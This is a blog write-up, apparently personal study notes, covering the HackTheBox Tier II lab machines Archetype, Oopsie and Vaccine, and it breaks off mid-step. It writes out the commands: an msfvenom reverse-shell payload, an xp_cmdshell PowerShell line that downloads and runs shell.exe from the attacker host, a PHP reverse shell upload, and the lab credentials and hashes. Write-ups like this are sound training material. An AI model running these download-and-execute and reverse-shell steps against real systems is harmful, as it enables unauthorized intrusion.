<!DOCTYPE html>
<html lang="en">
<!-- Beautiful Jekyll 5.0.0 | Copyright Dean Attali 2020 -->
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

  

  <title>Tier II</title>

  
  <meta name="author" content="Qv1nTv5">
  

  <meta name="description" content="1. Archetype (SMB Enum, MSQL Server, Impacket mssqlclient.py, WinPeas, Impacket psexec.py). At first, the port scan show us that there are several ports open, among them are a RPC port (135/tcp), Netbios (139/tcp), SMB (445/tcp) and Microsoft SQL Server (1433/tcp) and the machine is a Microsoft Windows OS: Thus, we...">

  

  

  
  <link rel="alternate" type="application/rss+xml" title="Home" href="http://localhost:4000/feed.xml">
  

  

  

  

  


  
    
      
  <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">


    
      
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css">


    
      
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic">


    
      
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800">


    
  

  
    
      <link rel="stylesheet" href="/assets/css/bootstrap-social.css">
    
      <link rel="stylesheet" href="/assets/css/beautifuljekyll.css">
    
  

  

  
  
  

  

  
  <meta property="og:site_name" content="Home">
  <meta property="og:title" content="Tier II">
  <meta property="og:description" content="1. Archetype (SMB Enum, MSQL Server, Impacket mssqlclient.py, WinPeas, Impacket psexec.py). At first, the port scan show us that there are several ports open, among them are a RPC port (135/tcp), Netbios (139/tcp), SMB (445/tcp) and Microsoft SQL Server (1433/tcp) and the machine is a Microsoft Windows OS: Thus, we...">

  

  
  <meta property="og:type" content="article">
  <meta property="og:article:author" content="Qv1nTv5">
  <meta property="og:article:published_time" content="2022-11-11T00:00:00-05:00">
  <meta property="og:url" content="http://localhost:4000/2022-11-11-Tier_2/">
  <link rel="canonical" href="http://localhost:4000/2022-11-11-Tier_2/">
  

  
  <meta name="twitter:card" content="summary">
  
  <meta name="twitter:site" content="@Qvintvs1">
  <meta name="twitter:creator" content="@Qvintvs1">

  <meta property="twitter:title" content="Tier II">
  <meta property="twitter:description" content="1. Archetype (SMB Enum, MSQL Server, Impacket mssqlclient.py, WinPeas, Impacket psexec.py). At first, the port scan show us that there are several ports open, among them are a RPC port (135/tcp), Netbios (139/tcp), SMB (445/tcp) and Microsoft SQL Server (1433/tcp) and the machine is a Microsoft Windows OS: Thus, we...">

  

  


  

  

</head>


<body>

  


  <nav class="navbar navbar-expand-xl navbar-light fixed-top navbar-custom top-nav-regular"><a class="navbar-brand" href="http://localhost:4000/">Home</a><button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>

  <div class="collapse navbar-collapse" id="main-navbar">
    <ul class="navbar-nav ml-auto">
          <li class="nav-item">
            <a class="nav-link" href="/BURPSUITEpage">BurpSuite</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="/THMpage">TryHackMe</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="/HackTheBoxpage">HackTheBox</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="/PEN200page">PEN-200</a>
          </li>
          <li class="nav-item dropdown">
            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Otros</a>
            <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                  <a class="dropdown-item" href="/REDTEAMBASICSpage">RedBasics</a>
                  <a class="dropdown-item" href="/BLUETEAMBASICSpage">BlueBasics</a>
                  <a class="dropdown-item" href="/REDESpage">Redes</a>
                  <a class="dropdown-item" href="/2022-11-17-GitBasics">Git</a>
            </div>
          </li>
        
          <li class="nav-item">
            <a class="nav-link" href="/PROJECTSpage">Projectos</a>
          </li>
        <li class="nav-item">
          <a class="nav-link" id="nav-search-link" href="#" title="Search">
            <span id="nav-search-icon" class="fa fa-search"></span>
            <span id="nav-search-text">Search</span>
          </a>
        </li></ul>
  </div>

  

  

</nav>



<div id="beautifuljekyll-search-overlay">

  <div id="nav-search-exit" title="Exit search">✕</div>
  <input type="text" id="nav-search-input" placeholder="Search">
  <ul id="search-results-container"></ul>
  
  <script src="https://unpkg.com/simple-jekyll-search@latest/dest/simple-jekyll-search.min.js"></script>
  <script>
    var searchjson = '[ \
       \
        { \
          "title"    : "Windows", \
          "category" : "pen", \
          "url"      : "/2023-01-05-5.WindowsBasics/", \
          "date"     : "January  5, 2023" \
        }, \
       \
        { \
          "title"    : "Networking", \
          "category" : "pen", \
          "url"      : "/2023-01-04-4.Networking/", \
          "date"     : "January  4, 2023" \
        }, \
       \
        { \
          "title"    : "Scripting", \
          "category" : "pen", \
          "url"      : "/2023-01-03-3.Scripting/", \
          "date"     : "January  3, 2023" \
        }, \
       \
        { \
          "title"    : "Practicals Tools", \
          "category" : "pen", \
          "url"      : "/2023-01-02-2.PracticalTools/", \
          "date"     : "January  2, 2023" \
        }, \
       \
        { \
          "title"    : "Linux Basics", \
          "category" : "pen", \
          "url"      : "/2023-01-01-1.LinuxBasics/", \
          "date"     : "January  1, 2023" \
        }, \
       \
        { \
          "title"    : "Easy", \
          "category" : "hack", \
          "url"      : "/2022-12-01-Easy/", \
          "date"     : "December  1, 2022" \
        }, \
       \
        { \
          "title"    : "Git Basics", \
          "category" : "", \
          "url"      : "/2022-11-17-GitBasics/", \
          "date"     : "November 17, 2022" \
        }, \
       \
        { \
          "title"    : "Tier II", \
          "category" : "hack", \
          "url"      : "/2022-11-11-Tier_2/", \
          "date"     : "November 11, 2022" \
        }, \
       \
        { \
          "title"    : "Tier I", \
          "category" : "hack", \
          "url"      : "/2022-11-10-Tier_1/", \
          "date"     : "November 10, 2022" \
        }, \
       \
        { \
          "title"    : "Tier 0", \
          "category" : "hack", \
          "url"      : "/2022-11-09-Tier_0/", \
          "date"     : "November  9, 2022" \
        }, \
       \
        { \
          "title"    : "7.BufferOverflow.", \
          "category" : "thm", \
          "url"      : "/2022-11-02-7.BufferOverflow/", \
          "date"     : "November  2, 2022" \
        }, \
       \
        { \
          "title"    : "6.Offensive Pentesting", \
          "category" : "thm", \
          "url"      : "/2022-11-01-6.OffensivePentesting/", \
          "date"     : "November  1, 2022" \
        }, \
       \
        { \
          "title"    : "5.RedTeam", \
          "category" : "thm", \
          "url"      : "/2022-10-30-5.RedTeam/", \
          "date"     : "October 30, 2022" \
        }, \
       \
        { \
          "title"    : "4.Windows", \
          "category" : "thm", \
          "url"      : "/2022-10-22-4.Windows/", \
          "date"     : "October 22, 2022" \
        }, \
       \
        { \
          "title"    : "3.Junior Penetrationtester path", \
          "category" : "thm", \
          "url"      : "/2022-09-02-3.JRPenetrationTester/", \
          "date"     : "September  2, 2022" \
        }, \
       \
        { \
          "title"    : "2.Complete Begginer path.", \
          "category" : "thm", \
          "url"      : "/2022-08-07-2.CompleteBegginer/", \
          "date"     : "August  7, 2022" \
        }, \
       \
        { \
          "title"    : "1.Pre-Security path.", \
          "category" : "thm", \
          "url"      : "/2022-07-11-1Pre-Security/", \
          "date"     : "July 11, 2022" \
        }, \
       \
        { \
          "title"    : "0.Scripting for pentesters.", \
          "category" : "thm", \
          "url"      : "/2022-07-10-0.Scripting_for_pentesters/", \
          "date"     : "July 10, 2022" \
        }, \
       \
        { \
          "title"    : "Burp Certified Practitioner Practice Exam.", \
          "category" : "burp", \
          "url"      : "/2022-03-30-PracticeExam/", \
          "date"     : "March 30, 2022" \
        }, \
       \
        { \
          "title"    : "22. OAuth Authentication.", \
          "category" : "burp", \
          "url"      : "/2022-03-27-22.OAuth_authentication/", \
          "date"     : "March 27, 2022" \
        }, \
       \
        { \
          "title"    : "21. HTTP Request Smuggling.", \
          "category" : "burp", \
          "url"      : "/2022-03-26-21.HTTP_request_smuggling/", \
          "date"     : "March 26, 2022" \
        }, \
       \
        { \
          "title"    : "20. HTTP Host Header Attacks.", \
          "category" : "burp", \
          "url"      : "/2022-03-25-20.HTTP_Host_header_attacks/", \
          "date"     : "March 25, 2022" \
        }, \
       \
        { \
          "title"    : "19. Web Cache Poisoning.", \
          "category" : "burp", \
          "url"      : "/2022-03-24-19.Web_cache_poisoning/", \
          "date"     : "March 24, 2022" \
        }, \
       \
        { \
          "title"    : "18. Server-Side Template Injection.", \
          "category" : "burp", \
          "url"      : "/2022-03-23-18.Serve-side_template_injection/", \
          "date"     : "March 23, 2022" \
        }, \
       \
        { \
          "title"    : "17. Insecure Deserialization.", \
          "category" : "burp", \
          "url"      : "/2022-03-22-17.Insecure_deserialization/", \
          "date"     : "March 22, 2022" \
        }, \
       \
        { \
          "title"    : "16. WebSockets.", \
          "category" : "burp", \
          "url"      : "/2022-03-21-16.WebSockets/", \
          "date"     : "March 21, 2022" \
        }, \
       \
        { \
          "title"    : "15.DOM-based XSS vulnerabilities.", \
          "category" : "burp", \
          "url"      : "/2022-03-20-15-DOM-based_vulnerabilities/", \
          "date"     : "March 20, 2022" \
        }, \
       \
        { \
          "title"    : "14. Clickjacking.", \
          "category" : "burp", \
          "url"      : "/2022-03-19-14.Clickjacking/", \
          "date"     : "March 19, 2022" \
        }, \
       \
        { \
          "title"    : "13. Cross-Origin Resource Sharing.", \
          "category" : "burp", \
          "url"      : "/2022-03-18-13.Cross-origin_resource_sharing_(CORS)/", \
          "date"     : "March 18, 2022" \
        }, \
       \
        { \
          "title"    : "12. Cross-Site Request Forgery.", \
          "category" : "burp", \
          "url"      : "/2022-03-17-12.Cross-site_request_forgery_(CSRF)/", \
          "date"     : "March 17, 2022" \
        }, \
       \
        { \
          "title"    : "11. Cross-Site Scripting.", \
          "category" : "burp", \
          "url"      : "/2022-03-16-11.Cross-site_scripting_(XSS)/", \
          "date"     : "March 16, 2022" \
        }, \
       \
        { \
          "title"    : "10. XXE Injection.", \
          "category" : "burp", \
          "url"      : "/2022-03-15-10.XXE_injection/", \
          "date"     : "March 15, 2022" \
        }, \
       \
        { \
          "title"    : "9. Server-Side Request Forgery.", \
          "category" : "burp", \
          "url"      : "/2022-03-14-9.Server-side_request_forgery/", \
          "date"     : "March 14, 2022" \
        }, \
       \
        { \
          "title"    : "8. File Upload.", \
          "category" : "burp", \
          "url"      : "/2022-03-13-8.File_upload_vulnerabilities/", \
          "date"     : "March 13, 2022" \
        }, \
       \
        { \
          "title"    : "7. Access Control.", \
          "category" : "burp", \
          "url"      : "/2022-03-12-7.Access_control/", \
          "date"     : "March 12, 2022" \
        }, \
       \
        { \
          "title"    : "6. Information Disclosure.", \
          "category" : "burp", \
          "url"      : "/2022-03-11-6.Information_disclosure/", \
          "date"     : "March 11, 2022" \
        }, \
       \
        { \
          "title"    : "5. Bussiness Logic Vulnerabilities.", \
          "category" : "burp", \
          "url"      : "/2022-03-10-5.Business_logic_vulnerabilities/", \
          "date"     : "March 10, 2022" \
        }, \
       \
        { \
          "title"    : "4. Command Injection.", \
          "category" : "burp", \
          "url"      : "/2022-03-09-4.Command_Injection/", \
          "date"     : "March  9, 2022" \
        }, \
       \
        { \
          "title"    : "3. Directory Traversal.", \
          "category" : "burp", \
          "url"      : "/2022-03-08-3.Directory_Traversal/", \
          "date"     : "March  8, 2022" \
        }, \
       \
        { \
          "title"    : "2. Authentication.", \
          "category" : "burp", \
          "url"      : "/2022-03-07-2.Authentication/", \
          "date"     : "March  7, 2022" \
        }, \
       \
        { \
          "title"    : "1. SQLInjection", \
          "category" : "burp", \
          "url"      : "/2022-03-06-1.SQLInjection/", \
          "date"     : "March  6, 2022" \
        }, \
       \
        { \
          "title"    : "Seguridad Perimetral", \
          "category" : "blueteam", \
          "url"      : "/2022-02-09-Seguridad_Perimetral/", \
          "date"     : "February  9, 2022" \
        }, \
       \
        { \
          "title"    : "Hardening de sistemas", \
          "category" : "blueteam", \
          "url"      : "/2022-02-09-Hardening_de_sistemas/", \
          "date"     : "February  9, 2022" \
        }, \
       \
        { \
          "title"    : "Bandit", \
          "category" : "otw", \
          "url"      : "/2022-02-08-Bandit/", \
          "date"     : "February  8, 2022" \
        }, \
       \
        { \
          "title"    : "Proxy", \
          "category" : "redes", \
          "url"      : "/2022-02-07-Proxys/", \
          "date"     : "February  7, 2022" \
        }, \
       \
        { \
          "title"    : "Protocolos Relevantes", \
          "category" : "redes", \
          "url"      : "/2022-02-07-Protocolos_Importantes/", \
          "date"     : "February  7, 2022" \
        }, \
       \
        { \
          "title"    : "Curso Básico Redes", \
          "category" : "redes", \
          "url"      : "/2022-02-07-Precurso_Redes/", \
          "date"     : "February  7, 2022" \
        }, \
       \
        { \
          "title"    : "IPs", \
          "category" : "redes", \
          "url"      : "/2022-02-07-IPs/", \
          "date"     : "February  7, 2022" \
        }, \
       \
        { \
          "title"    : "Movimientos Laterales", \
          "category" : "redteam", \
          "url"      : "/2022-02-06-Introducci%C3%B3n_a_movimientos_laterales/", \
          "date"     : "February  6, 2022" \
        }, \
       \
        { \
          "title"    : "Evasión de Defensas", \
          "category" : "redteam", \
          "url"      : "/2022-02-05-Evasi%C3%B3n_de_Defensas/", \
          "date"     : "February  5, 2022" \
        }, \
       \
        { \
          "title"    : "Escalada de privilegios", \
          "category" : "redteam", \
          "url"      : "/2022-02-05-Escalada_de_privilegios/", \
          "date"     : "February  5, 2022" \
        }, \
       \
        { \
          "title"    : "Metasploit", \
          "category" : "redteam", \
          "url"      : "/2022-02-04-Metasploit_B%C3%A1sico/", \
          "date"     : "February  4, 2022" \
        }, \
       \
        { \
          "title"    : "Ataques a aplicaciones Android", \
          "category" : "redteam", \
          "url"      : "/2022-02-03-Ataques_aplicaciones_android/", \
          "date"     : "February  3, 2022" \
        }, \
       \
        { \
          "title"    : "Ataque a aplicaciones web.", \
          "category" : "redteam", \
          "url"      : "/2022-02-02-Ataques_a_aplicaciones_web/", \
          "date"     : "February  2, 2022" \
        }, \
       \
        { \
          "title"    : "Ataques a Infraestructuras y Redes", \
          "category" : "redteam", \
          "url"      : "/2022-02-01-Ataques_a_Infraestructuras_y_Redes/", \
          "date"     : "February  1, 2022" \
        }, \
       \
        { \
          "title"    : "Análisis de Objetivos", \
          "category" : "redteam", \
          "url"      : "/2022-01-28-An%C3%A1lisis_de_Objetivos/", \
          "date"     : "January 28, 2022" \
        }, \
       \
       \
        { \
          "title"    : "Blueteam Basics", \
          "category" : "page", \
          "url"      : "/BLUETEAMBASICSpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "PortSwigger BurpSuite Curse", \
          "category" : "page", \
          "url"      : "/BURPSUITEpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Exploiting &amp; Reversing", \
          "category" : "page", \
          "url"      : "/EXPREVpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "HackTheBox", \
          "category" : "page", \
          "url"      : "/HackTheBoxpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "PEN200 notes", \
          "category" : "page", \
          "url"      : "/PEN200page/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Proyectos", \
          "category" : "page", \
          "url"      : "/PROJECTSpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Networking Basics", \
          "category" : "page", \
          "url"      : "/REDESpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "RedTeam Basics", \
          "category" : "page", \
          "url"      : "/REDTEAMBASICSpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Retired Machines", \
          "category" : "page", \
          "url"      : "/RetiredMachinespage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "TryHackMe", \
          "category" : "page", \
          "url"      : "/THMpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "About me", \
          "category" : "page", \
          "url"      : "/aboutme/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "THM", \
          "category" : "page", \
          "url"      : "/preOSCPpage/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Tag Index", \
          "category" : "page", \
          "url"      : "/tags/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page2/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page3/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page4/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page5/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page6/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page7/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page8/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page9/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page10/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page11/", \
          "date"     : "January 1, 1970" \
        }, \
       \
        { \
          "title"    : "Germán Sanmillán", \
          "category" : "page", \
          "url"      : "/page12/", \
          "date"     : "January 1, 1970" \
        } \
       \
    ]';
    searchjson = JSON.parse(searchjson);

    var sjs = SimpleJekyllSearch({
      searchInput: document.getElementById('nav-search-input'),
      resultsContainer: document.getElementById('search-results-container'),
      json: searchjson
    });
  </script>
</div>





  <!-- TODO this file has become a mess, refactor it -->







<header class="header-section ">

<div class="intro-header no-img">
  <div class="container-md">
    <div class="row">
      <div class="col-xl-8 offset-xl-2 col-lg-10 offset-lg-1">
        <div class="post-heading">
          <h1>Tier II</h1>
          

          
            <span class="post-meta">Posted on November 11, 2022</span>
            
            
          
        </div>
      </div>
    </div>
  </div>
</div>
</header>





<div class=" container-md ">
  <div class="row">
    <div class=" col-xl-8 offset-xl-2 col-lg-10 offset-lg-1 ">

      

      

      <article role="main" class="blog-post">
        <h3 id="1-archetype-smb-enum-msql-server-impacket-mssqlclientpy-winpeas-impacket-psexecpy">1. Archetype (SMB Enum, MSQL Server, Impacket mssqlclient.py, WinPeas, Impacket psexec.py).</h3>

<p>At first, the port scan show us that there are several ports open, among them are a RPC port (135/tcp), Netbios (139/tcp), SMB (445/tcp) and Microsoft SQL Server (1433/tcp) and the machine is a Microsoft Windows OS:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109092638.png" text-align="center" />
</div>

<p>Thus, we go to enumerate the services availables and we start with the SMB shares. We launch a Nmap script to see what shares are availables and from which user are accessible and what are the permissions the user have:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">--min-rate</span> 10000 <span class="nt">--script</span> smb-enum-shares.nse <span class="nt">-p445</span> &lt;IP&gt;
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109093200.png" text-align="center" />
</div>

<p>We see that exists a share called ‘backups’ that is accessible by user ‘guest’ (with which isn’t necesary use password) but only can read the contents of the share. So, with <em>smbclient</em> tool we enter in the share to see a file that content some sql databases credentials:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109093454.png" text-align="center" />
</div>

<p>With the smb command: ‘more &lt;file&gt;’ we proceed to see the contents of the file:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109093553.png" text-align="center" />
</div>

<p>It is obvius that this are credentials for the MSQL service on port 1433: ARCHETYPE\sql_svc:M3g4c0rp123.</p>

<p>Then, we proceed to connect with the Impacket Collection python3 script <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py">mssqlclient.py</a> to connect with the mssql server:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 mssqlclient.py <span class="nt">-p</span> 1433 sql_svc@10.129.172.5 <span class="nt">-windows-auth</span>
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109094452.png" text-align="center" />
</div>

<p>Once there, with the ‘help’ term we discover a feature that allow us to execute OS commands into the server gaining efectively RCE on the Windows machine:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109100204.png" text-align="center" />
</div>

<p>Thus, only last to use a vulnerability mapping tool like [Winpeas.exe]https://github.com/carlospolop/PEASS-ng/releases/tag/20221106).</p>

<p>First, we are going to leverage our shell to a formal meterpreter-shell.</p>

<p>We create a Msfvenom payload with the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-p</span> windows/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.16.152 <span class="nv">LPORT</span><span class="o">=</span>4444 <span class="nt">-f</span> exe <span class="nt">-o</span> shell.exe
</code></pre></div></div>

<p>And then open a python http server:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 <span class="nt">-m</span> http.server 8000
</code></pre></div></div>

<p>Then, we upload the file to the server with the following command on the shell of the SQL service:</p>

<pre><code class="language-mssql">xp_cmdshell "powershell Invoke-WebRequest -Uri http://10.10.16.152:8000/shell.exe -OutFile C:\Users\sql_svc\Desktop\shell.exe"
</code></pre>

<p>Then a Get request must appear in our python http server:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109102211.png" text-align="center" />
</div>

<p>To ensure that the file has been uploaded we list the contains of the destiny directory:</p>

<pre><code class="language-mssql">xp_cmdshell "dir C:\Users\sql_svc\Desktop"
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109102316.png" text-align="center" />
</div>

<p>And we see that the shell.exe file appears on the desktop of our user.</p>

<p>Then we setup a multi-handler listener on metasploit setting correctly the payload and diferent options and execute the file in the server with:</p>

<pre><code class="language-mssql">xp_cmdshell "start C:\Users\sql_svc\Desktop\shell.exe"
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109102537.png" text-align="center" />
</div>

<p>And we leverage our shell:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109102643.png" text-align="center" />
</div>

<p>Next, we download winpeas from the <a href="https://github.com/carlospolop/PEASS-ng/releases/tag/20221106">Github repository</a> and upload it through meterpreter:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109105101.png" text-align="center" />
</div>

<p>And then execute it by building a shell an enter “.\winPEASx64.exe”:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109105142.png" text-align="center" />
</div>

<p>The script found history file that contains credentials of the administrator:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109105833.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109105857.png" text-align="center" />
</div>

<p>So we have the credentials, only last to use the <em>psexec.py</em> script from the impacket collection to gain access to the machine as administrator:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109111119.png" text-align="center" />
</div>

<p><br /></p>

<h3 id="2-oopsie-mapping-with-burp-idor-cookie-change-upload-php-shell-linpeassh-suid">2. Oopsie (Mapping with Burp, IDOR, Cookie change, Upload php shell, linpeas.sh, SUID).</h3>

<p>At firs we have a machine that is hosting two services a SSH service at port 22 and a HTTP serivce on port 80.</p>

<p>We introduce to the web and begin to map it, map subdomains but nothing of that make any result, only that exists an ‘/uploads’ file:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109125442.png" text-align="center" />
</div>

<p>And wappalyzer tell us that the sever is Apache and is PHP-based:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109125745.png" text-align="center" />
</div>

<p>At last, we use the BurpSuite tool for mapping the site and we observed that there is indeed a login page:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124002.png" text-align="center" />
</div>

<p>We go to that direction and pulse the botton to log in ass Guest:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124053.png" text-align="center" />
</div>

<p>Once there we see that in the web exists a feature to upload file but is restricted to admin user privileges users.</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124237.png" text-align="center" />
</div>

<p>Generally, the web check the type of user that is requesting a resource through the cookies. Checking at it we see that exists two cookies that caracterize our user as guest:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124330.png" text-align="center" />
</div>

<p>We can guess that the role must be “admin” but also remains the user cookie that contains an ID that we don’t know. Exploring the web we found an ‘account’ page that contains information about the current user account:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124534.png" text-align="center" />
</div>

<p>The URL shown that the page is companied by a parameter ‘id’. Maybe, the web would be IDOR vulnerable and changing the ‘id’ parameter would be the way to access the information of the admin account. We set up it at 1 and gain access to the admin’s account information:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124721.png" text-align="center" />
</div>

<p>We change the cookie correctly and go to the ‘uploads functionality’ page:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109124837.png" text-align="center" />
</div>

<p>Thus, we upload the <a href="https://github.com/pentestmonkey/php-reverse-shell">php-reverse-shell.php</a>, set up a netcat listener and visit: “http://megacorp.com/uploads/php-reverse-shell.php” obtaining a shell:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109125857.png" text-align="center" />
</div>

<p>Checking the files of the web page we get on the location: /var/www/html/cdn-cgi/login a db.php file that contains credentials that we use to login the account of robert through ssh:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109132015.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109132108.png" text-align="center" />
</div>

<p>Finally we discover a binary that call bash as unsafe maner and is run by root:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109132851.png" text-align="center" />
</div>

<p>And we gain root by:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109132945.png" text-align="center" />
</div>

<p><br /></p>

<h3 id="3-vaccine-ftp-zip2john-sqlshell-enumeration-vi-editor-shell">3. Vaccine (FTP, zip2john, sqlshell, enumeration, vi editor shell).</h3>

<p>At first the port scan show us that the machine is hosting 3 services, FTP, SSH and HTTP on default ports (21, 22, 80).</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109175758.png" text-align="center" />
</div>

<p>We start by enumerating the FTP server. At first we attemp to log in ass anonymous user and it works:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109175945.png" text-align="center" />
</div>

<p>We found a zip file called backup so we download it with the ‘get’ command and try to unzip it with ‘unzip’ but ask for password:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109180218.png" text-align="center" />
</div>

<p>We can try to crack the password with a tool of the JohnTheRipper suite <a href="https://secnhack.in/crack-zip-files-password-using-john-the-ripper/">zip2john</a>. First we use <em>zip2john</em> to extract a hash of the password, and the we attemp to crack the hash with JohnTheRipper:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109180524.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109180643.png" text-align="center" />
</div>

<p>It comes with two files, index.php and style.css. In the index.php we discover some credentials. We can see that the user is admin and the password is MD5 format:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109180940.png" text-align="center" />
</div>

<p>So we add “admin:2cb42f8734ea607eefed3b70af13bbd3” to a file named hash2.txt and try to crack it with John, indicating that is RAW-MD5 format:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109181143.png" text-align="center" />
</div>

<p>This could be a posible credentials for the web app.</p>

<p>So log in with the recopilated credentials and begin an enumeration of the web page but none of this bring a result. However, the search-bar seems to be vulnerable to a SQLi by introducing some test payloads:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109182457.png" text-align="center" />
</div>

<p>So we use the sqlmap to discover if the ‘search’ parameter of the web is vulnerable. With the following command addering the cookies of the admin user we discover that it is:</p>

